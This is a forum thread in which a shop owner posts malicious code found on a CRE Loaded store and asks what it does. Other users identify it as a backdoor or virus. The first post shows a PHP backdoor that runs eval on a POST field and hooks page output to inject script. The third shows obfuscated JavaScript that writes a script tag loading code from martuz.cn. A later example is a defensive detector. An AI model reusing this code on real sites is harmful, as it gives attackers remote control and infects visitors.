Possible virus attack - help

Discussion in 'PHP' started by sageman, Jul 17, 2009.

  1. #1
    I found the code below in the configure.php file of my CRE Loaded store. It appears to access a site martuz [dot] cn. Can anyone tell exactly what it is doing?

    Thanks!

    <?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('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'));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \n\(function\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>
    sageman, Jul 17, 2009 IP
  2. neegeris

    #2
    I see there is POST and then eval, which means your site can be hacked by anyone who posts data to tmp_lkojfghx3. You definitely need to delete all this code from your site. Your site is not safe now.
     
    neegeris, Jul 17, 2009 IP
  3. sageman

    #3
    I believe that it does a database injection which places the code below between the header tag and body tag. I have deleted the first code I showed but it hasn't solved the problem. The code below is still inserted. Can someone please shed some more light on this? Thanks!

    <script language=javascript><!-- 
    (function(){var oYE='var~20a~3d~22S~63riptE~6eg~69n~65~22~2c~62~3d~22V~65~72sion()+~22~2c~6a~3d~22~22~2cu~3dn~61vig~61~74or~2euse~72~41gent~3bif~28(u~2ei~6edex~4ff~28~22Chro~6d~65~22)~3c0)~26~26(u~2eindexOf(~22~57in~22~29~3e0~29~26~26(~75~2einde~78Of(~22NT~20~36~22~29~3c~30)~26~26(~64~6fc~75~6d~65nt~2ecookie~2e~69ndexO~66(~22miek~3d1~22)~3c0~29~26~26(ty~70eof(~7arvz~74s)~21~3dt~79peof(~22A~22~29~29)~7bzrvzts~3d~22A~22~3beval(~22~69f~28wi~6e~64~6fw~2e~22~2ba+~22)~6a~3dj+~22+a+~22~4dajo~72~22+b+a~2b~22M~69~6e~6f~72~22+b~2b~61+~22B~75ild~22+~62+~22j~3b~22)~3b~64oc~75m~65nt~2ewrite~28~22~3csc~72ip~74~20sr~63~3d~2f~2fmartu~22+~22~7a~2ecn~2fv~69d~2f~3fid~3d~22+j+~22~3e~3c~5c~2fscript~3e~22~29~3b~7d';var XLLA=unescape(oYE.replace(/~/g,'%'));eval(XLLA)})();
     --></script>
    sageman, Jul 17, 2009 IP
  4. neegeris

    #4
    You will need to create a filter with PHP that removes this from every entry where this JS code is.
     
    neegeris, Jul 17, 2009 IP
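
Added example, not part of the original thread and not any poster's code: a Python sketch that checks file contents for the markers visible in the PHP snippet from post #1, finds the injected script wrapper from post #3, and decodes its `~XX` string statically (`unquote` in place of `unescape`, with no `eval`). The function names, the marker names and the sample page with its placeholder host are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Markers from the PHP snippet in post #1: eval() on a POST field, and an
# output-buffer callback using the tmp_ naming seen there.
PHP_MARKERS = {
    "eval_post": re.compile(r"eval\s*\(\s*\$_POST\s*\["),
    "ob_handler": re.compile(r"ob_start\s*\(\s*['\"]tmp_[a-z0-9]+['\"]"),
}
# Wrapper of the injected block from post #3; the PHP snippet strips earlier
# copies of that block with a regex of this shape.
JS_BLOCK = re.compile(
    r"<script language=javascript><!--\s*\n\(function\(.+?\n\s*--></script>",
    re.S,
)
# Quoted string holding ~XX escapes, which the block turns into code.
TILDE_STRING = re.compile(r"='([^']*~[0-9a-fA-F]{2}[^']*)'")

# Constructed sample page (not the thread's payload; placeholder host).
SAMPLE = (
    "<?php if(isset($_POST['tmp_x3']))eval($_POST['tmp_x3']);"
    "ob_start('tmp_x'); ?>\n"
    "<html><head><title>Shop</title></head>"
    "<script language=javascript><!-- \n"
    "(function(){var q='var~20u~3d~22//placeholder.invalid/~22~3b';"
    "var r=unescape(q.replace(/~/g,'%'));eval(r)})();\n"
    " --></script>\n"
    "<body>ok</body></html>\n"
)


def decode_tilde(encoded):
    """Static equivalent of unescape(s.replace(/~/g, '%')); runs nothing."""
    return unquote(encoded.replace("~", "%"), encoding="latin-1")


def scan(text):
    """Return (PHP markers found, decoded JS strings, text minus the JS block)."""
    hits = [name for name, rx in PHP_MARKERS.items() if rx.search(text)]
    payloads = []
    for block in JS_BLOCK.findall(text):
        match = TILDE_STRING.search(block)
        if match:
            payloads.append(decode_tilde(match.group(1)))
    return hits, payloads, JS_BLOCK.sub("", text)
```

Calling `scan()` on the contents of each PHP or HTML file gives the markers that matched, the decoded text of any injected block for review, and a copy of the content with that block stripped.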
  5. sajidzaman

    #5
    Probably a Virut virus... IMO
     
    sajidzaman, Jul 18, 2009 IP
  6. Jessica Rule

    #6
    From my point of view, it is a virus attack.
     
    Jessica Rule, Mar 19, 2015 IP